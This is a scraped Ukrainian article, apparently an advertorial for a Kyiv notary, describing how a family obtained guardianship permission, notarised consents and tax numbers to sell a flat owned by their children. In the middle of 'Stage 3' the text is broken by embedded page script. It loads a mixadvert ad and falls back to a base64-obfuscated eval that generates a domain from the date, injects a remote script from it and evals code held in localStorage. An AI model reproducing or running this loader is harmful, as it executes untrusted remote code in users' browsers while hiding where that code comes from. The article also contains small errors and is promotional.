Які етапи продажу квартири, яка належить дітям? Які документи потрібно отримати? До кого звертатись?

В цьому матеріалі, говоримо про випадок, який дійсно виникнув в місті Києві у лютому 2021 року. Нижче, надана вся потрібна інформація щодо отримання необхідних дозволів та паперів. Консультував, щодо цього питання нотаріус Володимир Чуловський, який має значний досвід роботи з нерухомістю.

Реальна життєва ситуація звичайної київської родини

До нотаріуса звернулася сім’я: мати Оксана, чоловік Андрій, та їхні двоє дітей 16 й 3 роки — Данило та Сергій відповідно. Родина мешкає в маленькій квартирі на 43 км² і має намір купити більш просторе житло. Але нерухоме майно, в якому вони живуть зараз належить дітям. Тому батьки звернулися до нотаріальної контори в центрі Києва, аби отримати консультацію від нотаріуса В. Чуловського. Вони вже давно слідкували за його блогом у Фейсбук, тому вирішили скористатися саме його послугами. 

В. Чуловський

Отримавши досвід у цій складній (на перший погляд) справі, родина вирішила ним поділитися з читачами, щоб таким чином допомогти іншим. Переконавшись у можливості вчинення задуманого, завдячуючи співпраці з юристом професіоналом, детально розповідає про всі нюанси справи та пройдений шлях до омріяного житла.

Особливості захисту державою прав дітей на житло

Права дитини на житло — це обов’язок держави. Вимоги, щодо процедури зміни наявної квартири на іншу — відрізняються, залежно від віку дитини, який поділяється на дві категорії:

малолітні — до 14 років;неповнолітні — 14-18 років.

Отже, виходить, що в нашій родині є неповнолітній Данило і малолітній Сергій. Поки діти не досягли повноліття, батьки, для продажу житла, можуть вчинити дії, які:

не передбачають ніяких обмежень та дозволів;потребують отримання різних дозволів, включно від органів опіки та піклування;неможливі ні за яких умов, наприклад, дарування від імені дитини.

За дозволом Органів опіки та піклування можна оформити угоди, які потребують нотаріального завірення та державної реєстрації. Це необхідно при обміні житла та поділу житлового приміщення. Отримавши дозвіл на продаж квартири ми маємо право оформити документи з нотаріальним завіренням, щодо зміни нерухомого майна, власниками якого є наші діти. Та тільки за умови “збільшення площі та покращення умов” проживання дітей!

Наші фактичні дії для продажу квартири дітей

Для отримання потрібних документів ми з Андрієм звернутися в Орган опіки, по району міста, в якому зареєстровані діти. Там було необхідно надати інформацію, яка стосується:

житла, що продається в якій зареєстревані;нерухомості, яку родина має намір придбати.

Ми розуміли, що цей процес може відбуватися тривалий час й враховували це, плануючи процес продажу та купівлі нової нерухомості. В результаті нам видали дозвіл, на укладання договору від імені малолітнього Сергія. Неповнолітній Данило може самостійно розпоряджатися майном, але тільки при наявності дозволу від нас, своїх батьків. Цей документ має бути обов’язково засвідчений нотаріально. Вказані документи та договір склав з нашою домовленістю нотаріус Чуловський.

Саме за його допомогою, всі необхідні дії ми розділили на етапи та виконували їх покроково.

Етап 1. Звернутися в службу опіки та отримати у них дозвіл на продаж квартири від імені малолітнього Сергія.

Етап 2. Отримати нотаріальне завірення дозволу від батьків для розв’язування питань, щодо майна неповнолітнього Данила.

Етап 3. Узгодити одночасне оформлення двох угод купівлі-продажу. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Етап 4. Засвідчити довіреність від власника майна (він проживає за кордоном) на продаж у нотаріуса.

Етап 5. Отримати ІПН дітей у податковій службі за місцем їх реєстрації.

Далеко не у кожної сім’ї є можливість спочатку купити нове житло, а тільки тоді продавати те, в якому вони живуть в цей час. Це, торкається і нашої родини. Тому нотаріус порадив дуже просте та надійне рішення — в один день, в одному офісі, провести послідовно дві угоди. За вимогою органів опіки, спочатку потрібно купити нову квартиру, а тільки потім продати іншу.

Наша проблема ще полягала в тому, що власник нової квартири під час оформлення документів, знаходився в США. Для швидкого оформлення договору з продажу нерухомості його представник в Україні отримав відповідну довіреність, яка дозволяє діяти у справі, від імені власника квартири. Ця довіреність мала нотаріальне засвідчення. Така довіреність затверджена на території США, в Україні потребувала апостилю та перекладу українською мовою. До того ж, ще й засвідчення оригіналу підпису перекладача у нотаріуса.

ІПН (в пакетах документів дітей) використовується для внесення сплати в пенсійний фонд від їх імені при здійсненні операції купівлі-продажу майна.

Треба враховувати, що оплата передбачається від обох дітей. Тому для отримання ідентифікаційного коду на Сергія, якому ще немає 14 років, Оксана звернулась до податкової. Отримання цього документа передбачає написання відповідної заяви, вказавши паспортні дані особи, яка склала заяву. Надати також потрібно було свідоцтво про народження та документ, який підтверджує місце реєстрації дитини. Рекомендується після внесення коштів зберегти чек, який підтвердить виконання цього пункту.

Всі документи були завчасно підготовлені перед підписанням угоди купівлі-продажу.

Аби оформити все швидко та коректно, варто:

отримати належну первинну консультацію від юриста;визначити точний перелік необхідних документів.ретельно підготувати пакет документів.

Ми витратили зовсім небагато часу на оформлення документів й були впевнені в тому, що все оформлено коректно, бо скористалися послугами саме цього нотаріуса.

Володимир Чуловський надав попередню, безкоштовну консультацію, на яку ми записалися на сайті. І на додачу, саме за його допомогою, ця складна справа — розв’язалась успішно для моєї родини!

Подписывайтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/yaki-etapi-prodazhu-kvartiri-yaka-nalezhit-dityam-yaki-dokumenti-potribno-otrimati-do-kogo-zvertatis/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top